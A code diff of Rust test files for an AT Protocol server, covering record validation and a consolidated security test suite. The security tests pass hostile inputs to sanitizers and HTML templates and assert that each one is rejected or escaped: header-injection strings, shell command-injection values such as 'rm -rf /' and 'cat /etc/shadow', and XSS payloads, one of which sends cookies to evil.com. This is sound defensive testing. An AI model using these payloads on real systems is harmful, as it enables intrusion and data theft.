assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
197
198
+
let valid_block = json!({
199
"$type": "app.bsky.graph.block",
200
"subject": "did:plc:blocked123",
201
"createdAt": now()
202
});
203
+
assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid);
204
205
+
let invalid_block_subject = json!({
206
"$type": "app.bsky.graph.block",
207
"subject": "not-a-did",
208
"createdAt": now()
209
});
210
+
assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
211
}
212
213
#[test]
214
+
fn test_list_and_graph_records_validation() {
215
let validator = RecordValidator::new();
216
+
217
+
let valid_list = json!({
218
"$type": "app.bsky.graph.list",
219
"name": "My List",
220
"purpose": "app.bsky.graph.defs#modlist",
221
"createdAt": now()
222
});
223
+
assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid);
224
225
+
let list_name_too_long = json!({
226
"$type": "app.bsky.graph.list",
227
+
"name": "n".repeat(65),
228
"purpose": "app.bsky.graph.defs#modlist",
229
"createdAt": now()
230
});
231
+
assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
232
233
+
let list_empty_name = json!({
234
"$type": "app.bsky.graph.list",
235
"name": "",
236
"purpose": "app.bsky.graph.defs#modlist",
237
"createdAt": now()
238
});
239
+
assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
240
+
241
+
let valid_list_item = json!({
242
+
"$type": "app.bsky.graph.listitem",
243
+
"subject": "did:plc:test123",
244
+
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
245
+
"createdAt": now()
246
+
});
247
+
assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid);
248
}
249
250
#[test]
251
+
fn test_misc_record_types_validation() {
252
let validator = RecordValidator::new();
253
+
254
+
let valid_generator = json!({
255
"$type": "app.bsky.feed.generator",
256
"did": "did:web:example.com",
257
"displayName": "My Feed",
258
"createdAt": now()
259
});
260
+
assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid);
261
262
+
let generator_displayname_too_long = json!({
263
"$type": "app.bsky.feed.generator",
264
"did": "did:web:example.com",
265
+
"displayName": "f".repeat(241),
266
+
"createdAt": now()
267
+
});
268
+
assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
269
+
270
+
let valid_threadgate = json!({
271
+
"$type": "app.bsky.feed.threadgate",
272
+
"post": "at://did:plc:test/app.bsky.feed.post/123",
273
"createdAt": now()
274
});
275
+
assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid);
276
277
+
let valid_labeler = json!({
278
+
"$type": "app.bsky.labeler.service",
279
+
"policies": {
280
+
"labelValues": ["spam", "nsfw"]
281
+
},
282
+
"createdAt": now()
283
});
284
+
assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid);
285
}
286
287
#[test]
288
+
fn test_type_and_format_validation() {
289
+
let validator = RecordValidator::new();
290
+
let strict_validator = RecordValidator::new().require_lexicon(true);
291
+
292
+
let custom_record = json!({
293
"$type": "com.custom.record",
294
"data": "test"
295
});
296
+
assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown);
297
+
assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_))));
298
299
+
let type_mismatch = json!({
300
"$type": "app.bsky.feed.like",
301
"subject": {"uri": "at://test", "cid": "bafytest"},
302
"createdAt": now()
303
});
304
+
assert!(matches!(
305
+
validator.validate(&type_mismatch, "app.bsky.feed.post"),
306
+
Err(ValidationError::TypeMismatch { expected, actual }) if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"
307
+
));
308
309
+
let missing_type = json!({
310
"text": "Hello"
311
});
312
+
assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType)));
313
314
+
let not_object = json!("just a string");
315
+
assert!(matches!(validator.validate(¬_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_))));
316
317
+
let valid_datetime = json!({
318
"$type": "app.bsky.feed.post",
319
"text": "Test",
320
"createdAt": "2024-01-15T10:30:00.000Z"
321
});
322
+
assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
323
324
+
let datetime_with_offset = json!({
325
"$type": "app.bsky.feed.post",
326
"text": "Test",
327
"createdAt": "2024-01-15T10:30:00+05:30"
328
});
329
+
assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
330
331
+
let invalid_datetime = json!({
332
"$type": "app.bsky.feed.post",
333
"text": "Test",
334
"createdAt": "2024/01/15"
335
});
336
+
assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. })));
337
}
338
339
#[test]
340
+
fn test_record_key_validation() {
341
assert!(validate_record_key("3k2n5j2").is_ok());
342
assert!(validate_record_key("valid-key").is_ok());
343
assert!(validate_record_key("valid_key").is_ok());
344
assert!(validate_record_key("valid.key").is_ok());
345
assert!(validate_record_key("valid~key").is_ok());
346
assert!(validate_record_key("self").is_ok());
347
348
+
assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_))));
349
350
assert!(validate_record_key(".").is_err());
351
assert!(validate_record_key("..").is_err());
352
353
assert!(validate_record_key("invalid/key").is_err());
354
assert!(validate_record_key("invalid key").is_err());
355
assert!(validate_record_key("invalid@key").is_err());
356
assert!(validate_record_key("invalid#key").is_err());
357
358
+
assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_))));
359
+
assert!(validate_record_key(&"k".repeat(512)).is_ok());
360
}
361
362
#[test]
363
+
fn test_collection_nsid_validation() {
364
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
365
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
366
assert!(validate_collection_nsid("a.b.c").is_ok());
367
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
368
369
+
assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_))));
370
371
assert!(validate_collection_nsid("a").is_err());
372
assert!(validate_collection_nsid("a.b").is_err());
373
374
assert!(validate_collection_nsid("a..b.c").is_err());
375
assert!(validate_collection_nsid(".a.b.c").is_err());
376
assert!(validate_collection_nsid("a.b.c.").is_err());
377
378
assert!(validate_collection_nsid("a.b.c/d").is_err());
379
assert!(validate_collection_nsid("a.b.c_d").is_err());
380
assert!(validate_collection_nsid("a.b.c@d").is_err());
381
}
+93
-380
tests/security_fixes.rs
+93
-380
tests/security_fixes.rs
···
4
use bspds::oauth::templates::{error_page, login_page, success_page};
5
6
#[test]
7
-
fn test_sanitize_header_value_removes_crlf() {
8
let malicious = "Injected\r\nBcc: attacker@evil.com";
9
let sanitized = sanitize_header_value(malicious);
10
-
assert!(!sanitized.contains('\r'), "CR should be removed");
11
-
assert!(!sanitized.contains('\n'), "LF should be removed");
12
-
assert!(
13
-
sanitized.contains("Injected"),
14
-
"Original content should be preserved"
15
-
);
16
-
assert!(
17
-
sanitized.contains("Bcc:"),
18
-
"Text after newline should be on same line (no header injection)"
19
-
);
20
-
}
21
22
-
#[test]
23
-
fn test_sanitize_header_value_preserves_content() {
24
let normal = "Normal Subject Line";
25
-
let sanitized = sanitize_header_value(normal);
26
-
assert_eq!(sanitized, "Normal Subject Line");
27
-
}
28
29
-
#[test]
30
-
fn test_sanitize_header_value_trims_whitespace() {
31
let padded = " Subject ";
32
-
let sanitized = sanitize_header_value(padded);
33
-
assert_eq!(sanitized, "Subject");
34
-
}
35
36
-
#[test]
37
-
fn test_sanitize_header_value_handles_multiple_newlines() {
38
-
let input = "Line1\r\nLine2\nLine3\rLine4";
39
-
let sanitized = sanitize_header_value(input);
40
-
assert!(!sanitized.contains('\r'), "CR should be removed");
41
-
assert!(!sanitized.contains('\n'), "LF should be removed");
42
-
assert!(
43
-
sanitized.contains("Line1"),
44
-
"Content before newlines preserved"
45
-
);
46
-
assert!(
47
-
sanitized.contains("Line4"),
48
-
"Content after newlines preserved"
49
-
);
50
-
}
51
52
-
#[test]
53
-
fn test_email_header_injection_sanitization() {
54
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
55
let sanitized = sanitize_header_value(header_injection);
56
-
let lines: Vec<&str> = sanitized.split("\r\n").collect();
57
-
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
58
-
assert!(
59
-
sanitized.contains("Normal Subject"),
60
-
"Original content preserved"
61
-
);
62
-
assert!(
63
-
sanitized.contains("Bcc:"),
64
-
"Content after CRLF preserved as same line text"
65
-
);
66
-
assert!(
67
-
sanitized.contains("X-Injected:"),
68
-
"All content on same line"
69
-
);
70
}
71
72
#[test]
73
-
fn test_valid_phone_number_accepts_correct_format() {
74
assert!(is_valid_phone_number("+1234567890"));
75
assert!(is_valid_phone_number("+12025551234"));
76
assert!(is_valid_phone_number("+442071234567"));
77
assert!(is_valid_phone_number("+4915123456789"));
78
assert!(is_valid_phone_number("+1"));
79
-
}
80
81
-
#[test]
82
-
fn test_valid_phone_number_rejects_missing_plus() {
83
assert!(!is_valid_phone_number("1234567890"));
84
assert!(!is_valid_phone_number("12025551234"));
85
-
}
86
-
87
-
#[test]
88
-
fn test_valid_phone_number_rejects_empty() {
89
assert!(!is_valid_phone_number(""));
90
-
}
91
-
92
-
#[test]
93
-
fn test_valid_phone_number_rejects_just_plus() {
94
assert!(!is_valid_phone_number("+"));
95
-
}
96
-
97
-
#[test]
98
-
fn test_valid_phone_number_rejects_too_long() {
99
assert!(!is_valid_phone_number("+12345678901234567890123"));
100
-
}
101
102
-
#[test]
103
-
fn test_valid_phone_number_rejects_letters() {
104
assert!(!is_valid_phone_number("+abc123"));
105
assert!(!is_valid_phone_number("+1234abc"));
106
assert!(!is_valid_phone_number("+a"));
107
-
}
108
109
-
#[test]
110
-
fn test_valid_phone_number_rejects_spaces() {
111
assert!(!is_valid_phone_number("+1234 5678"));
112
assert!(!is_valid_phone_number("+ 1234567890"));
113
assert!(!is_valid_phone_number("+1 "));
114
-
}
115
116
-
#[test]
117
-
fn test_valid_phone_number_rejects_special_chars() {
118
assert!(!is_valid_phone_number("+123-456-7890"));
119
assert!(!is_valid_phone_number("+1(234)567890"));
120
assert!(!is_valid_phone_number("+1.234.567.890"));
121
-
}
122
123
-
#[test]
124
-
fn test_signal_recipient_command_injection_blocked() {
125
-
let malicious_inputs = vec![
126
-
"+123; rm -rf /",
127
-
"+123 && cat /etc/passwd",
128
-
"+123`id`",
129
-
"+123$(whoami)",
130
-
"+123|cat /etc/shadow",
131
-
"+123\n--help",
132
-
"+123\r\n--version",
133
-
"+123--help",
134
-
];
135
-
for input in malicious_inputs {
136
-
assert!(
137
-
!is_valid_phone_number(input),
138
-
"Malicious input '{}' should be rejected",
139
-
input
140
-
);
141
}
142
}
143
144
#[test]
145
-
fn test_image_file_size_limit_enforced() {
146
let processor = ImageProcessor::new();
147
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
148
let result = processor.process(&oversized_data, "image/jpeg");
···
156
}
157
Ok(_) => panic!("Should reject files over size limit"),
158
}
159
-
}
160
161
-
#[test]
162
-
fn test_image_file_size_limit_configurable() {
163
let processor = ImageProcessor::new().with_max_file_size(1024);
164
let data: Vec<u8> = vec![0u8; 2048];
165
-
let result = processor.process(&data, "image/jpeg");
166
-
assert!(result.is_err(), "Should reject files over configured limit");
167
}
168
169
#[test]
170
-
fn test_oauth_template_xss_escaping_client_id() {
171
-
let malicious_client_id = "<script>alert('xss')</script>";
172
-
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
173
-
assert!(!html.contains("<script>"), "Script tags should be escaped");
174
-
assert!(
175
-
html.contains("<script>"),
176
-
"HTML entities should be used for escaping"
177
-
);
178
-
}
179
180
-
#[test]
181
-
fn test_oauth_template_xss_escaping_client_name() {
182
-
let malicious_client_name = "<img src=x onerror=alert('xss')>";
183
-
let html = login_page(
184
-
"client123",
185
-
Some(malicious_client_name),
186
-
None,
187
-
"test-uri",
188
-
None,
189
-
None,
190
-
);
191
-
assert!(!html.contains("<img "), "IMG tags should be escaped");
192
-
assert!(
193
-
html.contains("<img"),
194
-
"IMG tag should be escaped as HTML entity"
195
-
);
196
-
}
197
198
-
#[test]
199
-
fn test_oauth_template_xss_escaping_scope() {
200
-
let malicious_scope = "\"><script>alert('xss')</script>";
201
-
let html = login_page(
202
-
"client123",
203
-
None,
204
-
Some(malicious_scope),
205
-
"test-uri",
206
-
None,
207
-
None,
208
-
);
209
-
assert!(
210
-
!html.contains("<script>"),
211
-
"Script tags in scope should be escaped"
212
-
);
213
-
}
214
215
-
#[test]
216
-
fn test_oauth_template_xss_escaping_error_message() {
217
-
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
218
-
let html = login_page(
219
-
"client123",
220
-
None,
221
-
None,
222
-
"test-uri",
223
-
Some(malicious_error),
224
-
None,
225
-
);
226
-
assert!(
227
-
!html.contains("<script>"),
228
-
"Script tags in error should be escaped"
229
-
);
230
}
231
232
#[test]
233
-
fn test_oauth_template_xss_escaping_login_hint() {
234
-
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
235
-
let html = login_page(
236
-
"client123",
237
-
None,
238
-
None,
239
-
"test-uri",
240
-
None,
241
-
Some(malicious_hint),
242
-
);
243
-
assert!(
244
-
!html.contains("onfocus=\"alert"),
245
-
"Event handlers should be escaped in login hint"
246
-
);
247
-
assert!(html.contains("""), "Quotes should be escaped");
248
-
}
249
250
-
#[test]
251
-
fn test_oauth_template_xss_escaping_request_uri() {
252
-
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
253
-
let html = login_page("client123", None, None, malicious_uri, None, None);
254
-
assert!(
255
-
!html.contains("onmouseover=\"alert"),
256
-
"Event handlers should be escaped in request_uri"
257
-
);
258
-
}
259
260
-
#[test]
261
-
fn test_oauth_error_page_xss_escaping() {
262
-
let malicious_error = "<script>steal()</script>";
263
-
let malicious_desc = "<img src=x onerror=evil()>";
264
-
let html = error_page(malicious_error, Some(malicious_desc));
265
-
assert!(
266
-
!html.contains("<script>"),
267
-
"Script tags should be escaped in error page"
268
-
);
269
-
assert!(
270
-
!html.contains("<img "),
271
-
"IMG tags should be escaped in error page"
272
-
);
273
-
}
274
275
-
#[test]
276
-
fn test_oauth_success_page_xss_escaping() {
277
-
let malicious_name = "<script>steal_session()</script>";
278
-
let html = success_page(Some(malicious_name));
279
-
assert!(
280
-
!html.contains("<script>"),
281
-
"Script tags should be escaped in success page"
282
-
);
283
-
}
284
285
-
#[test]
286
-
fn test_oauth_template_no_javascript_urls() {
287
-
let html = login_page("client123", None, None, "test-uri", None, None);
288
-
assert!(
289
-
!html.contains("javascript:"),
290
-
"Login page should not contain javascript: URLs"
291
-
);
292
-
let error_html = error_page("test_error", None);
293
-
assert!(
294
-
!error_html.contains("javascript:"),
295
-
"Error page should not contain javascript: URLs"
296
-
);
297
-
let success_html = success_page(None);
298
-
assert!(
299
-
!success_html.contains("javascript:"),
300
-
"Success page should not contain javascript: URLs"
301
-
);
302
-
}
303
304
-
#[test]
305
-
fn test_oauth_template_form_action_safe() {
306
-
let malicious_uri = "javascript:alert('xss')//";
307
-
let html = login_page("client123", None, None, malicious_uri, None, None);
308
-
assert!(
309
-
html.contains("action=\"/oauth/authorize\""),
310
-
"Form action should be fixed URL"
311
-
);
312
}
313
314
#[test]
315
-
fn test_send_error_types_have_display() {
316
let timeout = SendError::Timeout;
317
-
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
318
-
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
319
assert!(!format!("{}", timeout).is_empty());
320
-
assert!(!format!("{}", max_retries).is_empty());
321
-
assert!(!format!("{}", invalid_recipient).is_empty());
322
-
}
323
324
-
#[test]
325
-
fn test_send_error_timeout_message() {
326
-
let error = SendError::Timeout;
327
-
let msg = format!("{}", error);
328
-
assert!(
329
-
msg.to_lowercase().contains("timeout"),
330
-
"Timeout error should mention timeout"
331
-
);
332
-
}
333
334
-
#[test]
335
-
fn test_send_error_max_retries_includes_detail() {
336
-
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
337
-
let msg = format!("{}", error);
338
-
assert!(
339
-
msg.contains("503") || msg.contains("retries"),
340
-
"MaxRetriesExceeded should include context"
341
-
);
342
}
343
344
#[tokio::test]
345
-
async fn test_check_signup_queue_accepts_session_jwt() {
346
use common::{base_url, client, create_account_and_login};
347
let base = base_url().await;
348
let http_client = client();
349
-
let (token, _did) = create_account_and_login(&http_client).await;
350
-
let res = http_client
351
-
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
352
-
.header("Authorization", format!("Bearer {}", token))
353
-
.send()
354
-
.await
355
-
.unwrap();
356
-
assert_eq!(
357
-
res.status(),
358
-
reqwest::StatusCode::OK,
359
-
"Session JWTs should be accepted"
360
-
);
361
let body: serde_json::Value = res.json().await.unwrap();
362
assert_eq!(body["activated"], true);
363
-
}
364
365
-
#[tokio::test]
366
-
async fn test_check_signup_queue_no_auth() {
367
-
use common::{base_url, client};
368
-
let base = base_url().await;
369
-
let http_client = client();
370
-
let res = http_client
371
-
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
372
-
.send()
373
-
.await
374
-
.unwrap();
375
-
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
376
let body: serde_json::Value = res.json().await.unwrap();
377
assert_eq!(body["activated"], true);
378
}
379
-
380
-
#[test]
381
-
fn test_html_escape_ampersand() {
382
-
let html = login_page("client&test", None, None, "test-uri", None, None);
383
-
assert!(html.contains("&"), "Ampersand should be escaped");
384
-
assert!(
385
-
!html.contains("client&test"),
386
-
"Raw ampersand should not appear in output"
387
-
);
388
-
}
389
-
390
-
#[test]
391
-
fn test_html_escape_quotes() {
392
-
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
393
-
assert!(
394
-
html.contains(""") || html.contains("""),
395
-
"Double quotes should be escaped"
396
-
);
397
-
assert!(
398
-
html.contains("'") || html.contains("'"),
399
-
"Single quotes should be escaped"
400
-
);
401
-
}
402
-
403
-
#[test]
404
-
fn test_html_escape_angle_brackets() {
405
-
let html = login_page("client<test>more", None, None, "test-uri", None, None);
406
-
assert!(html.contains("<"), "Less than should be escaped");
407
-
assert!(html.contains(">"), "Greater than should be escaped");
408
-
assert!(
409
-
!html.contains("<test>"),
410
-
"Raw angle brackets should not appear"
411
-
);
412
-
}
413
-
414
-
#[test]
415
-
fn test_oauth_template_preserves_safe_content() {
416
-
let html = login_page(
417
-
"my-safe-client",
418
-
Some("My Safe App"),
419
-
Some("read write"),
420
-
"valid-uri",
421
-
None,
422
-
Some("user@example.com"),
423
-
);
424
-
assert!(
425
-
html.contains("my-safe-client") || html.contains("My Safe App"),
426
-
"Safe content should be preserved"
427
-
);
428
-
assert!(
429
-
html.contains("read write") || html.contains("read"),
430
-
"Scope should be preserved"
431
-
);
432
-
assert!(
433
-
html.contains("user@example.com"),
434
-
"Login hint should be preserved"
435
-
);
436
-
}
437
-
438
-
#[test]
439
-
fn test_csrf_like_input_value_protection() {
440
-
let malicious = "\" onclick=\"alert('csrf')";
441
-
let html = login_page("client", None, None, malicious, None, None);
442
-
assert!(
443
-
!html.contains("onclick=\"alert"),
444
-
"Event handlers should not be executable"
445
-
);
446
-
}
447
-
448
-
#[test]
449
-
fn test_unicode_handling_in_templates() {
450
-
let unicode_client = "客户端 クライアント";
451
-
let html = login_page(unicode_client, None, None, "test-uri", None, None);
452
-
assert!(
453
-
html.contains("客户端") || html.contains("&#"),
454
-
"Unicode should be preserved or encoded"
455
-
);
456
-
}
457
-
458
-
#[test]
459
-
fn test_null_byte_in_input() {
460
-
let with_null = "client\0id";
461
-
let sanitized = sanitize_header_value(with_null);
462
-
assert!(
463
-
sanitized.contains("client"),
464
-
"Content before null should be preserved"
465
-
);
466
-
}
467
-
468
-
#[test]
469
-
fn test_very_long_input_handling() {
470
-
let long_input = "x".repeat(10000);
471
-
let sanitized = sanitize_header_value(&long_input);
472
-
assert!(
473
-
!sanitized.is_empty(),
474
-
"Long input should still produce output"
475
-
);
476
-
}
···
4
use bspds::oauth::templates::{error_page, login_page, success_page};
5
6
#[test]
7
+
fn test_header_injection_sanitization() {
8
let malicious = "Injected\r\nBcc: attacker@evil.com";
9
let sanitized = sanitize_header_value(malicious);
10
+
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
11
+
assert!(sanitized.contains("Injected") && sanitized.contains("Bcc:"));
12
13
let normal = "Normal Subject Line";
14
+
assert_eq!(sanitize_header_value(normal), "Normal Subject Line");
15
16
let padded = " Subject ";
17
+
assert_eq!(sanitize_header_value(padded), "Subject");
18
19
+
let multi_newline = "Line1\r\nLine2\nLine3\rLine4";
20
+
let sanitized = sanitize_header_value(multi_newline);
21
+
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
22
+
assert!(sanitized.contains("Line1") && sanitized.contains("Line4"));
23
24
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
25
let sanitized = sanitize_header_value(header_injection);
26
+
assert_eq!(sanitized.split("\r\n").count(), 1);
27
+
assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:"));
28
+
29
+
let with_null = "client\0id";
30
+
assert!(sanitize_header_value(with_null).contains("client"));
31
+
32
+
let long_input = "x".repeat(10000);
33
+
assert!(!sanitize_header_value(&long_input).is_empty());
34
}
35
36
#[test]
37
+
fn test_phone_number_validation() {
38
assert!(is_valid_phone_number("+1234567890"));
39
assert!(is_valid_phone_number("+12025551234"));
40
assert!(is_valid_phone_number("+442071234567"));
41
assert!(is_valid_phone_number("+4915123456789"));
42
assert!(is_valid_phone_number("+1"));
43
44
assert!(!is_valid_phone_number("1234567890"));
45
assert!(!is_valid_phone_number("12025551234"));
46
assert!(!is_valid_phone_number(""));
47
assert!(!is_valid_phone_number("+"));
48
assert!(!is_valid_phone_number("+12345678901234567890123"));
49
50
assert!(!is_valid_phone_number("+abc123"));
51
assert!(!is_valid_phone_number("+1234abc"));
52
assert!(!is_valid_phone_number("+a"));
53
54
assert!(!is_valid_phone_number("+1234 5678"));
55
assert!(!is_valid_phone_number("+ 1234567890"));
56
assert!(!is_valid_phone_number("+1 "));
57
58
assert!(!is_valid_phone_number("+123-456-7890"));
59
assert!(!is_valid_phone_number("+1(234)567890"));
60
assert!(!is_valid_phone_number("+1.234.567.890"));
61
62
+
for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`",
63
+
"+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help",
64
+
"+123\r\n--version", "+123--help"] {
65
+
assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious);
66
}
67
}
68
69
#[test]
70
+
fn test_image_file_size_limits() {
71
let processor = ImageProcessor::new();
72
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
73
let result = processor.process(&oversized_data, "image/jpeg");
···
81
}
82
Ok(_) => panic!("Should reject files over size limit"),
83
}
84
85
let processor = ImageProcessor::new().with_max_file_size(1024);
86
let data: Vec<u8> = vec![0u8; 2048];
87
+
assert!(processor.process(&data, "image/jpeg").is_err());
88
}
89
90
#[test]
91
+
fn test_oauth_template_xss_protection() {
92
+
let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None);
93
+
assert!(!html.contains("<script>") && html.contains("<script>"));
94
95
+
let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None);
96
+
assert!(!html.contains("<img ") && html.contains("<img"));
97
98
+
let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None);
99
+
assert!(!html.contains("<script>"));
100
101
+
let html = login_page("client123", None, None, "test-uri",
102
+
Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None);
103
+
assert!(!html.contains("<script>"));
104
+
105
+
let html = login_page("client123", None, None, "test-uri", None,
106
+
Some("\" onfocus=\"alert('xss')\" autofocus=\""));
107
+
assert!(!html.contains("onfocus=\"alert") && html.contains("""));
108
+
109
+
let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None);
110
+
assert!(!html.contains("onmouseover=\"alert"));
111
+
112
+
let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
113
+
assert!(!html.contains("<script>") && !html.contains("<img "));
114
+
115
+
let html = success_page(Some("<script>steal_session()</script>"));
116
+
assert!(!html.contains("<script>"));
117
+
118
+
for (page, name) in [
119
+
(login_page("client", None, None, "uri", None, None), "login"),
120
+
(error_page("err", None), "error"),
121
+
(success_page(None), "success"),
122
+
] {
123
+
assert!(!page.contains("javascript:"), "{} page has javascript: URL", name);
124
+
}
125
+
126
+
let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None);
127
+
assert!(html.contains("action=\"/oauth/authorize\""));
128
}
129
130
#[test]
131
+
fn test_oauth_template_html_escaping() {
132
+
let html = login_page("client&test", None, None, "test-uri", None, None);
133
+
assert!(html.contains("&") && !html.contains("client&test"));
134
135
+
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
136
+
assert!(html.contains(""") || html.contains("""));
137
+
assert!(html.contains("'") || html.contains("'"));
138
139
+
let html = login_page("client<test>more", None, None, "test-uri", None, None);
140
+
assert!(html.contains("<") && html.contains(">") && !html.contains("<test>"));
141
142
+
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"),
143
+
"valid-uri", None, Some("user@example.com"));
144
+
assert!(html.contains("my-safe-client") || html.contains("My Safe App"));
145
+
assert!(html.contains("read write") || html.contains("read"));
146
+
assert!(html.contains("user@example.com"));
147
148
+
let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None);
149
+
assert!(!html.contains("onclick=\"alert"));
150
151
+
let html = login_page("客户端 クライアント", None, None, "test-uri", None, None);
152
+
assert!(html.contains("客户端") || html.contains("&#"));
153
}
154
155
#[test]
156
+
fn test_send_error_display() {
157
let timeout = SendError::Timeout;
158
assert!(!format!("{}", timeout).is_empty());
159
+
assert!(format!("{}", timeout).to_lowercase().contains("timeout"));
160
161
+
let max_retries = SendError::MaxRetriesExceeded("Server returned 503".to_string());
162
+
let msg = format!("{}", max_retries);
163
+
assert!(!msg.is_empty());
164
+
assert!(msg.contains("503") || msg.contains("retries"));
165
166
+
let invalid = SendError::InvalidRecipient("bad recipient".to_string());
167
+
assert!(!format!("{}", invalid).is_empty());
168
}
169
170
#[tokio::test]
171
+
async fn test_signup_queue_authentication() {
172
use common::{base_url, client, create_account_and_login};
173
let base = base_url().await;
174
let http_client = client();
175
+
176
+
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
177
+
.send().await.unwrap();
178
+
assert_eq!(res.status(), reqwest::StatusCode::OK);
179
let body: serde_json::Value = res.json().await.unwrap();
180
assert_eq!(body["activated"], true);
181
182
+
let (token, _did) = create_account_and_login(&http_client).await;
183
+
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
184
+
.header("Authorization", format!("Bearer {}", token))
185
+
.send().await.unwrap();
186
+
assert_eq!(res.status(), reqwest::StatusCode::OK);
187
let body: serde_json::Value = res.json().await.unwrap();
188
assert_eq!(body["activated"], true);
189
}
+80
-346
tests/server.rs
+80
-346
tests/server.rs
···
6
use serde_json::{Value, json};
7
8
#[tokio::test]
9
-
async fn test_health() {
10
let client = client();
11
-
let res = client
12
-
.get(format!("{}/health", base_url().await))
13
-
.send()
14
-
.await
15
-
.expect("Failed to send request");
16
-
assert_eq!(res.status(), StatusCode::OK);
17
-
assert_eq!(res.text().await.unwrap(), "OK");
18
-
}
19
-
20
-
#[tokio::test]
21
-
async fn test_describe_server() {
22
-
let client = client();
23
-
let res = client
24
-
.get(format!(
25
-
"{}/xrpc/com.atproto.server.describeServer",
26
-
base_url().await
27
-
))
28
-
.send()
29
-
.await
30
-
.expect("Failed to send request");
31
-
assert_eq!(res.status(), StatusCode::OK);
32
-
let body: Value = res.json().await.expect("Response was not valid JSON");
33
assert!(body.get("availableUserDomains").is_some());
34
}
35
36
#[tokio::test]
37
-
async fn test_create_session() {
38
let client = client();
39
let handle = format!("user_{}", uuid::Uuid::new_v4());
40
-
let payload = json!({
41
-
"handle": handle,
42
-
"email": format!("{}@example.com", handle),
43
-
"password": "password"
44
-
});
45
-
let create_res = client
46
-
.post(format!(
47
-
"{}/xrpc/com.atproto.server.createAccount",
48
-
base_url().await
49
-
))
50
-
.json(&payload)
51
-
.send()
52
-
.await
53
-
.expect("Failed to create account");
54
assert_eq!(create_res.status(), StatusCode::OK);
55
let create_body: Value = create_res.json().await.unwrap();
56
let did = create_body["did"].as_str().unwrap();
57
let _ = verify_new_account(&client, did).await;
58
-
let payload = json!({
59
-
"identifier": handle,
60
-
"password": "password"
61
-
});
62
-
let res = client
63
-
.post(format!(
64
-
"{}/xrpc/com.atproto.server.createSession",
65
-
base_url().await
66
-
))
67
-
.json(&payload)
68
-
.send()
69
-
.await
70
-
.expect("Failed to send request");
71
-
assert_eq!(res.status(), StatusCode::OK);
72
-
let body: Value = res.json().await.expect("Response was not valid JSON");
73
-
